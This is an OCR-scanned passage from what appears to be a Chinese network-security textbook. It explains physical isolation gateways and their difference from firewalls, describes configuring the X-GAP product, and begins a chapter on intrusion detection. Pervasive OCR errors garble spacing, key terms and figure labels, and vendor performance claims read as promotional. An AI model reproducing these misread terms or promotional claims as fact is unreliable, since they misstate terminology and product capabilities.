本 质 的 区 别 。 下 面 以 内 网 与 专 网 之 间 的 物理 隔离 网 闸 为 例 , 说 明 通过 物理 隔离 网 闸 的 信息 
交换 过 程 。 

当 内 网 与 专 网 之 间 无 信息 交换 时 ,物理 隔离 网 疗 与 内 网 ,物理 隔离 网 闸 与 专 网 ,内 网 与 
专 网 之 间 是 完全 断 开 的 , 即 三 者 之 间 不 存在 物理 连接 和 逻辑 连接 ,如 图 14. 9 所 示 。 


内 网 服务 器 ” _ 物理 隔离 网 阅 。 专 网 服务 器 
A 


外 > 


图 14.9 内 网 ` 专 网 ,物理 隔离 网 闸 在 无 信息 交换 时 的 相互 关系 


当 内 网 数据 需要 传输 到 专 网 时 ,物理 隔离 网 疗 主动 向 内 网 服务 器 数据 交换 代理 发 起 非 
TCP/IP 协议 的 数据 连接 请 求 ,并 发 出 “ 写 ” 命 令 , 将 写 人 开关 合 上 ,并 把 所 有 的 协议 剥离 ,将 
原始 数据 写 人 存储 介质 。 在 写 和 之 前 ,根据 不 同 的 应 用 ,还 要 对 数据 进行 必要 的 完整 性 、 安 
全 性 检查 ,如 病毒 和 恶意 代码 检查 等 。 

在 此 过 程 中 , 专 网 服务 器 与 物理 隔离 网 阅 始终 处 于 断 开 状态 ,如 图 14. 10 所 示 。 

一 旦 数据 完全 写 入 物理 隔离 网 闸 的 存储 介质 ,开关 立即 打开 ,中 断 与 内 网 的 连接 。 转 而 
发 起 对 专 网 的 非 TCP/IP 协议 的 数据 连接 请 求 , 当 专 网 服务 器 收 到 请 求 后 ,发 出 “ 读 ” 命 令 ， 
将 物理 隔离 网 闻 存 储 介 质 内 的 数据 导向 专 网 服务 器 。 专 网 服务 器 收 到 数据 后 , 按 TCP/IP 
协议 重新 封装 接收 到 的 数据 , 交 给 应 用 系统 ,完成 了 内 网 到 专 网 的 信息 交换 。 如 图 14. 11 所 
示 。 至 于 从 专 网 到 内 网 的 信息 交换 ,与 上 述 过 程 类 似 ,只 是 方向 相反 。 

由 上 述 内 容 不 难看 出 : 每 一 次 数据 交换 ,物理 隔离 网 闸 都 经 历 了 数据 的 写 入 ,数据 读 出 
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14. 10 ”内 网 数据 写 人 物理 隔离 网 阅 时 的 信息 交换 关系 


物理 隔离 网 闸 读 控制 命令 


14.11 从 物理 隔离 网 闸 读数 据 时 信息 交换 关系 


两 个 过 程 ; 内 网 与 外 网 (或 内 网 与 专 网 ) 永 不 连接 ; 内 网 和 外 网 (或 内 网 与 专 网 ) 在 同一 时 刻 
最 多 只 有 一 个 同 物理 隔离 网 疗 建立 非 TCP/IP 协议 的 数据 连接 。 


14.6.3 物理 隔离 网 阁 的 组 成 
1. 物理 隔离 网 闸 由 如 下 3 个 部 分 组 成 


。 外 部 处 理 单元 。 
。 内 部 处 理 单元 。 


。 隔离 硬件 。 


系统 中 内 部 处 理 单元 连接 内 部 网 络 ,外 部 处 理 单元 连接 外 部 网 络 , 转 用 隔离 硬件 交换 单 
元 在 任 一 时 刻 点 仅 连接 外 部 处 理 单元 或 内 部 处 理 单元 ,与 两 者 间 的 连接 受 硬件 电路 控制 高 


速 切 换 。 


2. 物理 隔离 网 闸 的 主要 安全 模块 


。 安全 隔离 模块 : 


隔离 硬件 在 两 个 网 络 上 进行 切换 ,通过 对 硬件 上 的 存储 芯片 的 读 


写 ,完成 数据 的 交换 。 保 证 两 个 网 络 在 链 路 层 断 开 ,不 与 两 个 网 络 同时 连接 ,两 个 网 
络 交换 的 数据 必须 是 剥离 TCP/IP 协议 后 在 应 用 层 之 上 进行 。 


。 内 核 防护 模块 : 


IDS 等 。 


。 安全 检查 模块 : 
。 访 问 控 制 模 块 : 
。 安全 审计 模块 : 


在 内 、 外 部 处 理 单元 中 嵌入 安全 加 固 的 操作 系统 ,设置 基于 内 核 的 


数据 完整 性 检查 、 病 毒 查 杀 、 恶 意 攻击 代码 检查 等 。 
支持 身份 认证 ,数字 签名 。 

实行 强制 访问 控制 。 

建立 完善 日 志 系统 。 


14.6.4 物理 离 网 阅 的 功能 
物理 离 网 闸 具 有 以 下 主要 功能 。 


(1) 阻 断 网 络 的 直接 物理 连接 : 物理 隔离 网 闻 在 任何 时 刻 都 只 能 与 非 可 信和 网 络 和 可 信 
网 络 上 之 一 相连 接 ,而 不 能 同时 与 两 个 网 络 连接 。 

(2) 阻 断 网 络 的 逻辑 连接 : 物理 隔离 网 闻 不 依赖 操作 系统 、 不 支持 TCP/IP 协议 。 两 个 
网 络 之 间 的 信息 交换 必须 将 TCP/IP 协议 剥离 ,将 原始 数据 通过 P2P 的 非 TCP/IP 连接 方 
式 , 通 过 存储 介质 的 “ 写 人 ”与 * 读 出 ”完成 数据 转发 。 

(3) 数据 传输 机 制 的 不 可 编程 性 : 物理 隔离 网 闸 的 数据 传输 机 制 具 有 不 可 编程 的 
特性 。 

(4) 安全 审查 : 物理 隔离 网 阅 具 有 安全 审查 功能 , 即 网 络 在 将 原始 数据 " 写 入 ”物理 隔 
离 网 闻 前 ,根据 需要 对 原始 数据 的 安全 性 进行 检查 ,把 可 能 的 病毒 代码 、 恶 意 攻 击 代码 消灭 
干净 等 。 

(5) 原始 数据 无 危害 性 : 物理 隔离 网 疗 转发 的 原始 数据 ,不 具有 攻击 或 对 网 络 安全 有 
害 的 特性 。 就 像 txt 文本 不 会 有 病毒 一 样 ,也 不 会 执行 命令 等 。 

(6) 管理 和 控制 功能 : 建立 完善 的 日 志 系统 。 

(7) 根据 需要 建立 数据 特征 库 : 在 应 用 初始 化 阶段 ,结合 应 用 要 求 ,提取 应 用 数据 的 特 
征 ,形成 用 户 特有 的 数据 特征 库 ,作为 运行 过 程 中 数据 校 验 的 基础 。 当 用 户 请 求 时 ,提取 用 
户 的 应 用 数据 ,抽取 数据 特征 和 原始 数据 特征 库 比 较 , 符 合 原始 特征 库 的 数据 请 求 进入 请 求 
队列 ,不 符合 的 返回 用 户 ,实现 对 数据 的 过 滤 。 

(8) 根据 需要 提供 定制 安全 策略 和 传输 策略 的 功能 : 用 户 可 以 自行 设 定数 据 的 传输 策 
略 , 如 : 传输 单位 (基于 数据 还 是 基于 任务 )、 传 输 间隔 、 传 输 方 向 .传输 时 间 .启动 时 间 等 。 

(9) 支持 定时 /实时 文件 交换 ; 支持 单 向 /双向 文件 交换 ; 支持 数字 签名 .内容 过 滤 、 病 
毒 检查 等 功能 。 

(10) 邮件 同步 : 支持 标准 的 SMTP 服务 ,安全 、 高 可 用 性 的 邮件 过 滤 策 略 , 可 为 每 个 用 
户 配置 不 同 的 邮件 交换 策略 、 内 外 网 邮件 镜像 等 。 

(11) 数据 库 同步 : 双向 / 单 向 数据 同步 ,同步 内 容 可 定制 ,多 种 同步 方式 ,数据 可 定时 
更 新 。 

(12) 支持 多 种 数据 库 : 支持 Oracle、Sybase、Infomix、DB2、SQL Server 等 多 种 主流 数 
据 库 。 


14.6.5 物理 隔离 网 阅 的 应 用 定位 


1. 涉 密 网 与 非 涉 密 网 之 间 

涉 密 网 与 非 涉 密 网 之 间 的 应 用 ,如 图 14. 12 所 示 。 

2. 局 域 网 与 互联 网 之 间 ( 内 网 与 外 网 之 间 ) 

局 域 网 与 互联 网 之 间 的 应 用 ,如 图 14. 13 所 示 。 

有 些 局 域 网 络 ,特别 是 政府 办 公 网 络 ,涉及 政府 敏感 信息 ,有 时 需要 与 互联 网 在 物理 上 
断 开 ,用 物理 隔离 网 闸 是 一 个 常用 的 办 法 。 

3. 办 公 网 与 业务 网 之 间 

办 公 网 与 业务 网 之 间 的 应 用 ,如 图 14. 14 所 示 。 

由 于 办 公 网 络 与 业务 网 络 的 信息 敏感 程度 不 同 , 例 如 ,银行 的 办 公 网 络 和 银行 业务 网 络 
就 是 很 典型 的 信息 敏感 程度 不 同 的 两 类 网 络 。 为 了 提高 工作 效率 ,办 公 网 络 有 时 需要 与 业 
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务 网 络 交换 信息 。 为 解决 业务 网 络 的 安全 ,比较 好 的 办 法 就 是 在 办 公 网 与 业务 网 之 间 使 用 
物理 隔离 网 疗 ,实现 两 类 网 络 的 物理 隔离 。 
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涉 密 网 络 非 涉 密 网 络 
图 14.12 物理 隔离 网 闸 在 涉 密 网 络 与 非 涉 密 网 络 中 的 应 用 示意 图 
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互联 网 络 
图 14.13 物理 隔离 网 闸 在 局 域 网 与 互联 网 之 间 的 应 用 示意 图 
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业务 网 络 办 公 网 络 
图 14.14 物理 隔离 网 疗 在 办 公 网 与 业务 网 之 间 的 应 用 示意 图 


4. 电子 政务 的 内 网 与 专 网 之 间 

电子 政务 的 内 网 与 专 网 之 间 的 应 用 如 图 14. 15 所 示 。 

在 电子 政务 系统 建设 中 要 求 政府 内 网 与 外 网 之 间 用 逻辑 隔离 ,在 政府 专 网 与 内 网 之 间 
用 物理 隔离 。 现 常用 的 方法 是 用 物理 隔离 网 疗 来 实现 。 

5. 业务 网 与 互联 网 之 间 

业务 网 与 互联 网 之 间 的 应 用 ,如 图 14. 16 所 示 。 

电子 商务 网 络 一 边 连接 着 业务 网 络 服务 器 ,一 边 通过 互联 网 连接 着 广大 民众 。 为 了 保 
障 业务 网 络 服务 器 的 安全 ,在 业务 网 络 与 互联 网 之 间 应 实现 物理 隔离 。 
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图 14.16 ”网络 银 行 信息 系统 中 的 物理 隔离 网 闸 应 用 示意 图 


14.6.6 物理 隔离 网 闸 与 防火 墙 


在 设计 理念 方面 ,防火 墙 是 以 应 用 为 主 安全 为 辅 , 也 就 是 说 在 支持 尽 可 能 多 的 应 用 的 前 
提 下 ,来 保证 使 用 的 安全 。 防 火 墙 的 这 一 设计 理念 使 得 它 可 以 广泛 地 用 于 尽 可 能 多 的 领域 ， 
拥有 更 加 广泛 的 市 场 。 而 网 闸 则 是 以 安全 为 主 , 在 保证 安全 的 前 提 下 ,支持 尽 可 能 多 的 应 
用 。 网 疗 主要 用 于 安全 性 要 求 极 高 的 领域 ,例如 对 政府 网 络 ,工业 控制 系统 的 保护 等 。 显 
然 , 由 于 把 安全 性 放 在 首位 ,这 样 就 会 有 更 加 严格 的 安全 规则 和 更 多 的 限制 ,因此 可 以 应 用 
的 范围 也 较 防 火 墙 少 一 些 ,主要 用 那些 对 安全 性 要 求 较 高 的 环境 下 。 相 反 防 火 墙 可 以 应 用 
于 非常 广泛 的 应 用 领域 ,甚至 包括 个 人 计算 机 都 可 以 使 用 ,但 是 它 的 安全 性 往往 就 差 强 人 
意 。 人 们 常常 发 现 被 防火 墙 防护 的 网 络 依然 常常 被 黑客 和 病毒 攻击 。 由 于 这 种 设计 理念 的 
区 别 , 因 此 可 以 有 软件 防火 墙 , 但 是 却 不 会 有 软件 网 疗 。 

设计 理念 的 不 同 也 导致 系统 的 整体 设计 也 完全 不 同 。 硬 件 防 火 墙 虽然 可 以 有 多 种 设计 
方式 ,但 是 一 般 来 说 , 它 都 是 单一 的 计算 机 系统 由 一 个 操作 系统 来 控制 ,用 户 的 内 网 和 外 网 
都 连接 在 这 同一 个 系统 上 。 然 而 安全 隔离 网 疗 却 完全 不 同 , 它 至 少 由 3 部 分 组 成 : 内 网 处 


态 火 墙 与 肠 离 网 疝 
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理 单元 、 外 网 处 理 单元 和 一 个 隔离 岛 。 一 般 来 说 ,内 外 网 处 理 单元 是 两 个 完全 独立 计算 机 系 
统 , 拥 有 各 自 独立 的 操作 系统 。 内 网 处 理 单元 与 用 户 的 内 网 相连 ,外 网 处 理 单元 与 外 部 网 络 
相连 ,内 外 网 处 理 系统 之 间 通 过 隔离 岛 进行 非 协议 的 信息 交换 。 可 以 看 得 出 来 ,网 闸 的 结构 
较 防 火 墙 要 复杂 得 多 ,显然 有 两 个 独立 的 系统 分 别 连 接 内 外 网 ,中 间 再 由 隔离 岛 隔离 ,要 比 
防火 墙 的 设计 安全 得 多 ,当然 设计 的 难度 也 要 高 得 多 。 

无 论 从 功能 还 是 实现 原理 上 讲 ,物理 隔离 网 阅 和 防火 墙 是 完全 不 同 的 两 个 产品 ,防火墙 
是 保证 网 络 层 安全 的 边界 安全 工具 (如 通常 的 非 军事 化 区 ) ,而 物理 隔离 网 闸 重点 是 保护 内 
部 网 络 的 安全 。 因 此 两 种 产品 由 于 定位 的 不 同 ,因此 不 能 相互 取代 。 


14.7 网 络 隔离 产品 配置 实例 


14.7.1 产品 介绍 


由 中 网 公司 研制 开发 的 安全 隔离 和 信息 交换 系统 (X-Gap) ,能 够 较 好 地 解决 隔离 断 开 
和 数据 交换 的 难题 ,中 网 物理 隔离 网 闸 真 正 实现 了 两 个 网 络 之 间 的 物理 隔离 。X-Gap 中 断 
了 两 个 网 络 之 间 的 链 路 连接 .通信 连接 、 网 络 连接 和 应 用 连接 ,在 保证 两 个 网 络 完全 断 开 和 
协议 中 断 情况 下 ,以 非 网 络 方式 实现 了 数据 交换 。 没 有 任何 包 、 命 令 和 TCP/IP 协议 (包括 
UDP 和 ICMP) 可 以 穿 透 X-Gap, 它 具有 高 安全 、 高 带宽 、 高 速度 、 高 可 用 性 的 优点 。 此 外 ， 
由 于 采用 了 SCSI 技术 ,其 开关 效率 达到 纳 秒 级 ,彻底 解决 了 速度 慢 、 效 率 低 的 问题 。 除 此 
之 外 ,SCSI 控制 系统 本 身 具有 不 可 编程 的 特性 和 冲突 机 制 ,形成 简单 的 开关 原理 ,从 而 彻底 
解决 了 网 闸 开 关 的 安全 性 问题 。 物 理 隔离 是 通过 开关 来 实现 的 ,目前 常见 的 物理 隔离 开关 
技术 有 3 种 , 即 实时 开关 (Real-Time Switch) 、 单 向 连接 (One-Way Link) 和 网 络 开关 
(Network Switch)。 实 时 开关 和 单 向 连接 的 速度 要 快 一 些 ,网 络 开 关 的 速度 要 慢 一 些 。 人 
们 普遍 存在 对 开关 速度 的 担忧 ,担心 开关 速度 直接 影响 网 络 的 性 能 。 如 果 开 关 的 速度 低 ,网 
络 的 性 能 肯定 会 受到 影响 。 即 使 开关 的 速度 高 ,网 疗 的 性 能 也 受 主机 性 能 的 限制 。 不 管 开 
关 速 度 的 高 低 , 网 闸 性 能 的 上 限 都 不 会 超过 主机 的 上 限 。 中 网 物理 隔离 网 疗 通过 采用 主机 
的 CPU 时 钟 作为 开关 ,将 开关 功能 在 系统 的 内 核 中 实现 ,成 功 的 达到 网 疗 的 最 高 性 能 , 优 
于 常见 的 3 种 开关 技术 。 内 核 的 效率 也 远 远 高 于 外 设 的 效率 。 

在 用 户 要 求 进行 物理 隔离 ,同时 又 需要 实时 地 交换 数据 ,解决 物理 隔离 和 信息 交流 的 问 
题 时 ,采用 中 网 X-GAP 系列 产品 则 可 以 实现 两 网 之 间 必 要 的 “摆渡 ”, 又 保证 不 会 有 相互 人 
侵 的 安全 问题 。X-GAP 可 以 方便 地 集成 到 政府 电力、 工商 税务 、 公 安 、 交 通 、 能 源 , 金 融和 
大 型 企业 等 的 网 络 和 业务 环境 中 ,完善 地 保护 核心 安全 ,满足 客户 对 高 安全 、 高 性 能 、 高 可 靠 
性 的 应 用 需要 。 


14.7.2 配置 模式 与 配置 方法 


X-GAP 网 疗 的 系统 配置 包括 外 部 代理 配置 、 内 部 代理 配置 , 准 入 交换 服务 的 配置 、 准 出 
交换 服务 的 配置 及 高 级 配置 。 

1. 外 部 代理 配置 

使 用 中 网 X-GAP 网 闸 的 客户 端 软件 进行 登录 便 可 进行 配置 。 该 项 配置 为 用 户 提供 修 


改 . 设 置 该 代理 服务 器 的 IP 地 址 . 子 网 掩 码 、 网 关 、 域 名 .DNS 和 主机 名 等 配置 操作 。 在 这 
里 需要 指出 的 是 X-GAP 网 闸 的 管理 员 客 户 端 软件 必须 安装 在 网 阅 内 网 机 一 侧 ,不 能 将 管 
理 员 客 户 端 软 件 安装 在 网 疗 外 网 机 即 外 部 代理 服务 器 一 侧 。 同 时 ,不 能 在 外 网 配置 和 管理 
X-GAP 网 闻 , 这 是 由 网 阅 的 安全 设计 原则 所 决定 的 ,只 有 这 样 才能 够 有 效 地 确保 X-GAP 网 
闻 的 安全 策略 不 被 外 网 黑客 算 改 。 

2. 内 部 代理 配置 

X-GAP 网 闻 的 内 网 主机 即 内 部 服务 器 位 于 可 信 的 内 网 ,因此 X-GAP 网 阅 内 部 服务 器 
上 内 网 的 网 络 配置 如 果 不 正确 ,将 不 能 保证 网 闸 起 到 内 部 代理 服务 器 的 作用 ,该 项 配置 包括 
内 部 代理 服务 器 的 IP 地 址 、 子 网 掩 码 、 网 关 、 域 名 .DNS 和 主机 名 等 内 容 。 

3. 准 出 交换 服务 配置 

X-GAP 网 闸 的 准 出 交换 服务 配置 包括 HTTP 信息 交换 、.SMTP 信息 交换 .POP3 信息 
交换 .FTP 信息 交换 、 定 制 TCP 信息 交换 和 定制 UDP 信息 交换 等 内 容 的 配置 。 

HTTP 信息 交换 服务 的 功能 是 提供 访问 HTTP 的 服务 ,为 可 信 内 网 用 户 通过 X-GAP 
网 闸 访 问 不 可 信和 的 外 网 的 目标 地 址 或 目标 地 址 域 提供 信息 交换 服务 。HTTP 访问 交换 服 
务 分 为 3 大 类 : 访问 一 个 站 点 时 的 状况 .内 部 访问 多 个 站 点 时 的 状况 及 内 部 访问 任何 站 点 
时 的 状况 。 

HTTP 过 滤 的 功能 是 HTTP 代理 为 可 信 内 网 用 户 通 过 X-GAP 网 闸 访问 不 可 信 的 外 
网 的 WWW 服务 提供 应 用 级 的 信息 交换 服务 。 通 过 HTTP 过 滤 ,能 够 对 HTTP 协议 的 内 
容 和 命令 进行 过 滤 。 具 体 的 过 滤 分 为 HTTP 命令 过 滤 、HTTP 关键 词 过 滤 和 HTTP 的 
URL 过 滤 。 

SMTP 信息 交换 服务 的 功能 是 为 可 信 内 网 用 户 通过 X-GAP 网 闸 向 不 可 信 的 外 网 接收 
发 送 邮件 提供 服务 。 此 服务 通过 在 网 闸 的 内 部 主机 上 建立 一 个 虚拟 的 代理 服务 来 保证 ,用 
户 端的 软件 无 须 改变 。POP3 信息 交换 服务 的 功能 是 为 可 信 内 网 用 户 通 过 X-GAP 网 闸 访 
问 不 可 信 的 外 网 的 POP3 服务 提供 应 用 级 安全 代理 服务 。 

FTP 信息 交换 服务 是 为 可 信 内 网 用 户 通过 X-GAP 网 疗 访问 不 可 信 的 外 网 的 FTP 服 
务 提 供应 用 级 安全 代理 服务 。 而 FTP 过 滤 功 能 是 FTP 代理 为 可 信 内 网 用 户 通过 X-GAP 
网 疗 访问 不 可 信 的 外 网 的 FTP 服务 提供 应 用 级 的 安全 代理 服务 时 ,通过 FTP 过 滤 ,能 够 对 
FTP 协议 的 内 容 和 命令 进行 过 滤 ,可 以 明确 指定 只 有 哪些 命令 通过 , 即 “ 白 名 单 ? 过 滤 ,也 可 
以 明确 指定 不 允许 哪些 命令 通过 , 即 * 黑 名 单 ”? 过 滤 ,具体 过 滤 分 为 FTP 命令 过 滤 、FTP 关 
键 词 过 滤 。 

定制 TCP/UDP 代理 的 功能 是 为 可 信 内 网 用 户 通过 X-GAP 网 疗 访问 不 可 信 的 外 网 的 
基于 TCP/UDP 通信 协议 服务 提供 安全 的 信息 交换 服务 。 

4. 准 人 交换 服务 配置 

X-GAP 网 疗 准 入 交换 服务 就 是 在 允许 不 可 信 的 外 网 访问 可 信 的 内 网 时 ,网 闸 所 提供 的 
各 种 信息 交换 服务 ,使 不 可 信 内 网 的 用 户 能 够 通过 这 些 应 用 代理 安全 访问 内 部 可 信 网 中 的 
特定 资源 和 应 用 服务 。X-GAP 网 闸 准 入 交换 服务 配置 包括 定制 TCP 信息 交换 设置 与 FTP 
信息 交换 设置 。 

任何 一 次 内 外 网 的 数据 交换 均 是 通过 双向 TCP 代理 的 方式 实现 的 , 即 进行 了 两 次 B/S 
请 求 和 应 答 。 在 每 一 次 请 求 或 应 答 之 前 均 完全 剥离 TCP/IP 协议 ,进行 彻底 的 安全 检查 , 通 
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秦 于 案例 的 网 络 安 会 技术 与 实践 


过 了 检查 的 才 可 进行 下 一 次 的 请 求 或 应 答 ,在 会 话 过 程 中 的 任何 一 次 检测 不 能 通过 , 则 中 断 
通信 ,阻止 连接 ,并 进行 严格 的 日 志 记 录 。 

5. X-GAP 网 闸 的 高 级 配置 

X-GAP 网 疗 的 高 级 配置 包括 防 病毒 . 防 泄密 等 内 容 的 配置 。 防 病毒 功能 是 指 网 疗 根据 
文件 的 类 型 ,文件 长 度 对 经 过 网 疗 的 文件 进行 病毒 过 滤 , 从 而 达到 预防 病毒 .避免 可 信和 内 网 
感染 病毒 的 目的 。 如 果 安 全 管理 员 对 所 需 应 用 进行 了 定制 防 病毒 配置 ,允许 网 疗 启动 防 病 
毒 的 功能 时 ,网 阅 对 于 所 有 准 入 交换 服务 和 准 出 交换 服务 中 的 各 种 应 用 代理 在 进行 代理 服 
务 时 ,就 会 根据 网 闸 的 配置 要 求 检 查 所 有 文件 是 否 带 有 病毒 ,对 于 带 有 病毒 的 文件 ,网 闸 将 
启动 杀毒 模块 , 查 杀 病毒 ,只 有 完全 和 成 功 地 检测 了 病毒 之 后 ,才能 通过 特定 的 应 用 代理 将 
该 文件 和 数据 传递 到 可 信 的 内 部 网 络 中 去 ,确保 内 部 网 络 不 被 病毒 感染 。 

X-GAP 网 闻 的 防 泄密 功能 是 可 以 对 浏览 器 中 输入 的 各 种 敏感 信息 进行 限制 ,预防 内 网 
用 户 访问 外 网 的 网 站 时 出 现 泄密 。X-GAP 网 闻 通 过 定义 一 些 安全 保护 轮廓 ,来 解决 泄密 
问题 。 

(1) X-GAP 网 疗 在 内 部 网 络 对 互联 网 的 访问 中 ,禁止 了 POST 命令 。 

(2) 只 准许 用 户 发 送 标准 的 http://www. any. com 请 求 。 

(3) 只 准许 用 户 第 一 次 发 送 符合 RFC 标准 的 http://www. any. com 标准 请 求 ,并 建立 
响应 的 状态 表 , 不 准许 用 户 第 一 次 直接 发 送 带 后 级 的 URL 请 求 ,如 http://www. any 
com/xxx. htm 等 。 

(4) 通过 Robot 或 SPIDER 技术 将 该 IP 地 址 下 的 一 级 内 容 取 回 ,将 所 有 的 URL 列 出 
来 建立 URL 索引 表 , 然 后 将 内 容 单 向 传输 给 涉 密 网 , 供 涉 密 网 用 户 在 内 部 查看 。 如 果 用 户 
对 该 页 面 的 下 级 URL 感 兴趣 ,请求 下 级 URL ,将 该 URL 发 送 到 外 部 主机 。 外 部 主机 收 到 
该 URL 后 ,检查 用 户 是 否 建立 URL 状态 表 ,. 如 果 没 有 , 则 放弃 ; 如 果 有 , 则 检查 状态 表 中 是 
否 有 匹配 的 URL, 没 有 则 放弃 ,有 则 让 外 部 主机 发 起 进一步 的 连接 请 求 , 并 重复 以 上 步骤 。 


14.8 小 结 


本 章 主要 介绍 防火 墙 与 隔离 网 疗 的 相关 知识 ,包括 防火 墙 的 基本 概念 防火 墙 体系 结 
构 、 防 火 墙 所 使 用 的 主要 技术 、 隔 离 网 疗 的 基本 概念 、 隔 离 网 阅 所 使 用 的 主要 技术 等 内 容 。 
并 结合 市 场 主 流产 品 对 防火 墙 与 隔离 网 闸 的 配置 方法 做 了 具体 介绍 。 同 时 ,提供 一 些 具 体 
的 使 用 技巧 。 


14.9 习 题 
1. 什么 是 防火 墙 ? 计算 机 防火 墙 的 种 类 有 哪些 ? 
2. 简 述 防火 墙 的 体系 结构 。 
3. 简 述 防火 墙 的 缺点 。 
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. 简 述 防火 墙 与 隔离 网 闻 在 网 络 中 起 到 的 不 同 作用 。 


14. 10 实 


. 在 防火 墙 上 实现 地 址 池 的 配置 。 


. 在 防火 墙 上 实现 扩展 访问 控制 列表 的 配置 。 


. 在 防火 墙 上 实现 AAA 认证 的 配置 。 
. 使 用 隔离 网 闸 实现 内 外 网 物理 隔离 。 
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第 15 章 入 侵 检测 技术 


预防 是 理想 的 ,但 检测 是 必须 的 。 
一 网络 名 言 


有 门 必然 有 颖 ,有 颖 就 有 被 侵入 的 可 能 。 
一 - 周 帅 


15.1 入 侵 检 测 概 述 


入 侵 检 测 技 术 是 网 络 安全 的 核心 技术 之 一 , 它 通 过 从 计算 机 网 络 或 计算 机 系统 中 的 若 
干 关键 点 收集 信息 并 对 其 进行 分 析 , 从 而 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 
遭 到 攻击 的 迹象 。 本 章 全 面 介 绍 了 入 侵 检测 技术 ,重点 讲解 了 入 侵 检测 的 有 关 理 论 知识 、 技 
术 原 理 和 应 用 案例 。 


15.1.1 入 侵 检 测 系统 的 基本 概念 


1980 年 ,James P. Anderson 第 一 次 系统 阐述 了 入 侵 检测 的 概念 .并 将 和 人 侵 行为 分 为 外 
部 渗透 .内 部 渗透 和 不 法 行为 3 种 ,还 提出 了 利用 审计 数据 监视 入 侵 活动 的 思想 。1986 年 
Dorothy E. Denning 提出 实时 异常 检测 的 概念 并 建立 了 第 一 个 实时 入 侵 检 测 模型 ,命名 为 
入 侵 检测 专家 系统 (IDES); 1990 年 ,L.T. Heberlein 等 设计 出 监视 网 络 数据 流 的 人 侵 检测 
系统 NSM(Network Security Monitor)。 自 此 之 后 ,入 侵 检测 系统 才 真 正 发 展 起 来 。 

Anderson 将 人 侵 尝试 或 威胁 定义 为 : 潜在 的 、 有 预谋 的 、 未 经 授权 的 访问 信息 ,操作 信 
息 、 致 使 系统 不 可 靠 或 无 法 使 用 的 企图 。 而 入 侵 检测 的 定义 为 : 发 现 非 授 权 使 用 计算 机 的 
个 体 或 计算 机 系统 的 合法 用 户 滥 用 其 访问 系统 的 权利 以 及 企图 实施 上 述 行为 的 个 体 。 执 行 
入 侵 检 测 任务 的 程序 即 是 入 侵 检 测 系 统 。 入 侵 检测 系统 也 可 以 定义 为 : 检测 企图 破坏 计算 
机 资源 的 完整 性 ,真实 性 和 可 用 性 的 行为 的 软件 。 

入侵 检测 系统 执行 的 主要 任务 包括 : 监视 、 分 析 用 户 及 系统 活动 ; 审计 系统 构造 和 弱 
点 ; 识别 ,反映 已 知 进攻 的 活动 模式 ,向 相关 人 士 报 警 ; 统计 分 析 异 常 行为 模式 ; 评估 重要 
系统 和 数据 文件 的 完整 性 ; 审计 、 跟 踪 管 理 操作 系统 ,识别 用 户 违反 安全 策略 的 行为 。 

入 侵 检测 一 般 分 为 3 个 步骤 : 信息 收集 ,数据 分 析 、 响 应 。 

入 侵 检测 的 目的 : 

(1) 识别 人 侵 者 。 


(2) 识别 人 侵 行为 。 

(3) 检测 和 监视 以 实施 的 人 侵 行为 。 

(4) 为 对 抗 人 侵 提 供 信息 ,阻止 人 侵 的 发 生 和 事态 的 扩大 。 

由 于 入 侵 检测 系统 的 市 场 在 近 几 年 中 飞速 发 展 ,许多 公司 投入 到 这 一 领域 上 来 。 如 
Venustech( 启 明星 辰 ) Internet Security System(ISS) ,思科 、 赛 门 铁 克 等 公司 都 推出 了 自 
己 的 产品 。 


15.1.2 入 侵 检 测 系统 的 结构 
入侵 检测 系统 一 般 由 事件 发 生 器 .事件 分 析 器 、 响 应 单元 和 事件 数据 库 4 个 部 分 组 成 ， 


如 图 15.1 所 示 。 
1 一 一 一 一 | 响应 单元 | 输出 : 反应 或 事件 
! 输 出 : 高 级 
! 中 断 事件 输出 : 事件 的 存储 信息 


事件 分 析 器 事件 数据 库 
+ 
1 


! 输 入 : 原始 事件 源 
图 15.1 入 侵 检测 系统 的 组 成 部 分 


1. 事件 发 生 器 

事件 发 生 器 产生 事件 ,这些 事件 都 是 入 侵 检测 系统 需要 分 析 的 数据 ,它们 可 能 是 网 络 中 
的 数据 包 或 从 系统 日 志 中 得 到 的 信息 等 。 

2. 事件 分 析 器 

事件 分 析 器 得 到 一 个 事件 ,利用 事件 数据 库 中 的 入 侵 特征 、 用 户 历 史 行 为 模型 等 作为 依 
据 对 事件 进行 分 析 ,判断 该 事件 的 合法 性 。 

3. 响应 单元 

事件 分 析 器 对 某 一 事件 进行 分 析 并 得 出 结果 ,响应 单元 即 对 这 个 结果 做 出 相应 的 反应 ， 
如 切断 连接 、 改 变 文件 属性 或 报警 等 。 

4. 事件 数据 库 

事件 数据 库 用 于 存放 攻击 类 型 数据 或 检测 规则 ,如 入 侵 特 征 描述 、 用 户 历史 行为 模型 及 
专家 经 验 等 。 


15.1.3 入 侵 检 测 系 统 的 需求 将 性 


一 个 成 功 的 入 侵 检 测 系 统 至 少 要 满足 以 下 5 个 主要 要 求 。 

1. 实时 性 要 求 

如 果 攻 击 或 者 攻击 的 企图 能 够 被 尽快 发 现 ,就 有 可 能 查 出 攻击 者 的 位 置 ,阻止 进一步 的 
攻击 活动 ,有 可 能 把 破坏 控制 在 最 小 限度 .并 能 够 记录 下 攻击 过 程 ,可 作为 证 据 回 放 。 实 时 
入侵 检测 可 以 避免 管理 员 通 过 对 系统 日 志 进 行 审 计 以 查找 入 侵 者 或 人 侵 行为 线索 时 的 种 种 
不 便 与 技术 限制 。 
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基于 案例 的 网 络 安 会 技术 与 实践 


2. 可 扩展 性 要 求 

攻击 手段 多 而 复杂 ,攻击 行为 特征 也 各 不 相同 。 所 以 必须 建立 一 种 机 制 , 把 入 侵 检测 系统 
的 体系 结构 与 使 用 策略 区 分 开 。 入 侵 检测 系统 必须 能 够 在 新 的 攻击 类 型 出 现时 ,可 以 通过 某 
种 机 制 在 无 需 对 人 侵 检测 系统 本 身体 系 进行 改动 的 情况 下 ,使 系统 能 够 检测 到 新 的 攻击 行为 。 
在 人 侵 检测 系统 的 整体 功能 设计 上 ,也 必须 建立 一 种 可 以 扩展 的 结构 ,以便 适 应 扩展 要 求 。 

3. 适应 性 要 求 

入 侵 检测 系统 必须 能 够 适用 于 多 种 不 同 的 环境 ,比如 高 速 大 容量 计算 机 网 络 环境 。 并 
且 在 系统 环境 发 生 改 变 ,比如 增加 环境 中 的 计算 机 系统 数量 ,改变 计算 机 系统 类 型 时 ,人 侵 
